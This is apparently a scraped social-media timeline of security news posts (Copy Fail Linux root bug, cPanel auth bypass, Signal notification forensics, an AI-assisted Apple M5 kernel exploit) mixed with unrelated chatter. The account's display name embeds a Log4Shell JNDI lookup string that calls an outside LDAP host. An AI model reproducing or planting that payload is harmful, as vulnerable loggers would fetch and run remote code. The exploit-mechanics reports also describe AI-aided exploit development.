Thireus ${jndi:ldap://twt.thi.sh/x} ☠

We are investigating unauthorized access to GitHub’s internal repositories. While we currently have no evidence of impact to customer information stored outside of GitHub’s internal repositories (such as our customers’ enterprises, organizations, and repositories), we are closely monitoring our infrastructure for follow-on activity.

⚠️First Public macOS Kernel Exploit on Apple M5 Prepared Using Mythos Preview in Five Days Source: cybersecuritynews.com/first-public-m… Apple's M5 silicon has reportedly been exploited for the first time in a public macOS kernel memory corruption attack, successfully bypassing the company's notable hardware-level memory protection. The exploit chain starts from an unprivileged local user account, uses only standard system calls, and delivers a full root shell, all while Apple's Memory Integrity Enforcement (MIE) is active. The breakthrough was made possible in part by Anthropic's Mythos Preview, a powerful AI model that helped identify the two vulnerabilities and assisted throughout the exploit development process. #cybersecuritynews

⚠️ Let's Encrypt Halts Certificate Issuance After Cross-Signed Root Certificate Incident Source: cybersecuritynews.com/lets-encrypt-h… Let's Encrypt temporarily suspended all certificate issuance on May 8, 2026, after engineers identified a critical issue involving a cross-signed certificate linking the organization's Generation X root to its upcoming Generation Y root infrastructure. The incident triggered a complete shutdown of issuance across both production and staging environments before services were restored within hours. At 18:37 UTC on May 8, Let's Encrypt engineers became aware of a potential incident and immediately halted all certificate issuance as a precautionary measure. #cybersecuritynews

#Linux 7.0.5, 6.18.28, 6.12.87, 6.6.138, 6.1.171, 5.15.205, and 5.10.255 kernels are now available for download at kernel.org to patch the new "Dirty Frag" security vulnerability. #OpenSource

⚠️ UPDATE: #cPanel flaw now tracked as CVE-2026-41940 (CVSS 9.8)—an auth bypass granting unauthenticated admin access. Reportedly exploited as a 0-day, with activity observed for at least 30 days before disclosure. Root cause: CRLF injection enabling session forgery. 🔗 Exploit mechanics and real-world impact → thehackernews.com/2026/04/critic…

‼️🚨 BREAKING: An AI found a Linux kernel zero-day that roots every distribution since 2017. The exploit fits in 732 bytes of Python. Patch your kernel ASAP. The vulnerability is CVE-2026-31431, nicknamed "Copy Fail," disclosed today by Theori. It has been sitting quietly in the Linux kernel for nine years. Most Linux privilege-escalation bugs are picky. They need a precise timing window (a "race"), or specific kernel addresses leaked from somewhere, or careful tuning per distribution. Copy Fail needs none of that. It is a straight-line logic mistake that works on the first try, every time, on every mainstream Linux box. The attacker just needs a normal user account on the machine. From there, the script asks the kernel to do some encryption work, abuses how that work is wired up, and ends up writing 4 bytes into a memory area called the "page cache" (Linux's high-speed copy of files in RAM). Those 4 bytes can be aimed at any program the system trusts, like /usr/bin/su, the shortcut to becoming root. Result: the next time anyone runs that program, it lets the attacker in as root. What should worry most: the corruption never touches the file on disk. It only exists in Linux's in-memory copy of that file. If you imaged the hard drive afterwards, the on-disk file would match the official package hash exactly. Reboot the machine, or just put it under memory pressure (any normal system load that needs the RAM), and the cached copy reloads fresh from disk. Containers do not help either. The page cache is shared across the whole host, so a process inside a container can use this bug to compromise the underlying server and reach into other tenants. The original sin was a 2017 "in-place optimization" in a kernel crypto module called algif_aead. It was meant to make encryption slightly faster. The change broke a critical safety assumption, and nobody noticed for nine years. That bug then rode every kernel update from 2017 to today. This vulnerability affects the following: 🔴 Shared servers (dev boxes, jump hosts, build servers): any user becomes root 🔴 Kubernetes and container clusters: one compromised pod escapes to the host 🔴 CI runners (GitHub Actions, GitLab, Jenkins): a malicious pull request becomes root on the runner 🔴 Cloud platforms running user code (notebooks, agent sandboxes, serverless functions): a tenant becomes host root Timeline: 🔴 March 23, 2026: reported to the Linux kernel security team 🔴 April 1: patch committed to mainline (commit a664bf3d603d) 🔴 April 22: CVE assigned 🔴 April 29: public disclosure Mitigation: update your kernel to a build that includes mainline commit a664bf3d603d. If you cannot patch immediately, turn off the vulnerable module: echo "install algif_aead /bin/false" > /etc/modprobe.d/disable-algif.conf rmmod algif_aead 2>/dev/null || true For environments that run untrusted code (containers, sandboxes, CI runners), block access to the kernel's AF_ALG crypto interface entirely, even after patching. Almost nothing legitimate needs it, and blocking it shuts the door on this whole class of bug...

⚡ Apple fixed an iOS bug where deleted notifications stayed stored on devices. The flaw let message data persist after apps like Signal were removed. It surfaced after forensic extraction. The patch now clears and prevents retention. 🔗 Details → thehackernews.com/2026/04/apple-…

@sciencegirl Give this man larger buckets!

Chrome plating is a process that coats an object, typically metal or plastic—with a thin layer of chromium to enhance its appearance and durability

In 2019 Edward Snowden said this about WhatsApp: “The problem with applications like WhatsApp is, it was actually designed to have very strong encryption, just the same as the gold standard today which would be the signal messenger or the wire messenger, but then it was bought by Facebook because it was so good, and now Facebook is quite aggressively reducing the security of WhatsApp about once a quarter, and they’re trying to do it as quietly as possible, so a messenger that the people are comfortable using now is actually a danger to you.” When Snowden speaks, you listen!

Most users believe that because Signal uses end-to-end encryption (E2EE), their messages are untouchable. While the pipe is secure, the moment that message hits your screen, it leaves a trail. This specific case highlights a critical persistence artifact, the iOS Notification Center. When a notification pops up, iOS often caches the text in a system database, typically NotificationCenter.db or delimited.db, so you can scroll through your history. Even if you delete the message in the app or delete the app entirely, that system level record remains until it’s overwritten. The FBI didn’t break Signal's encryption, they performed a file system extraction to recover the OS's own logs of what was displayed to the user. The device shown is a Cellebrite UFED. It is the industry standard for bypassing device locks and pulling these hidden SQLite databases during a physical or advanced logical extraction. Your phone is designed for convenience, and convenience is the enemy of privacy. Your device is a silent witness that never stops taking notes. In the world of Mobile Forensics, we don’t always need to crack the vault, we just need to find the notes the operating system left on the desk. To mitigate this, go to Settings > Notifications > Show Previews and set it to "Never" or "When Unlocked."

@x0rz @signalapp Also, @Apple can you safely purge from the notification DB app notification entries when app is uninstalled or notifications already seen?

@x0rz @signalapp - can you make this the default behaviour please? And for existing installs to ask users if they’d like to switch this off/on? Thanks.

Go to your Signal settings and disable notification content (or only names)

OH: some dude in Fujian (scam capital of China) uses hacked credit cards to subscribe to Claude Code Max, resell them as API at 20% cost, and then sell user traces to Chinese labs for distillation. Bruh.

Big headline, luckily not as scary as it looks, but an important lesson... The FBI extracted Signal messages from a defendant's iPhone even after the app was deleted. Here's what actually happened and what to do 🧵

Don't let Obama play the Iran card in order to start a war in order to get elected--be careful Republicans!

@5nBOI @Ahmadansari2233 "At Apple, we believe your iPhone should feel personal, even in public. So we designed a display that intelligently protects what’s on your screen from curious eyes around you. We call it SmartSight."

@Ahmadansari2233 This feature will bang so much in the iPhone 32 pro max

Samsungs new privacy display is wild!!

@Alibaba_Qwen 🎉🥳 llama.cpp support wen?

Qwen3-ASR and Qwen3-ForcedAligner are now open source — production-ready speech models designed for messy, real-world audio, with competitive performance and strong robustness. ● 52 languages & dialects with auto language ID (30 languages + 22 dialects/accents) ● Robust in noisy and complex settings (yes, singing and songs too) ● Long audio support: up to 20 minutes per pass ● Word/phrase-level timestamps:  high-precision alignment for 11 languages via Qwen3-ForcedAligner, stronger than MFA/CTC/CIF-style aligners Also included: a full open-source inference & finetuning stack with vLLM batch, streaming, and async serving. GitHub:  github.com/QwenLM/Qwen3-A… Hugging Face: huggingface.co/collections/Qw… ModelScope: modelscope.cn/collections/Qw… Hugging Face Demo:  huggingface.co/spaces/Qwen/Qw… ModelScope Demo: modelscope.cn/studios/Qwen/Q… Blog:  qwen.ai/blog?id=qwen3a… Paper:  github.com/QwenLM/Qwen3-A…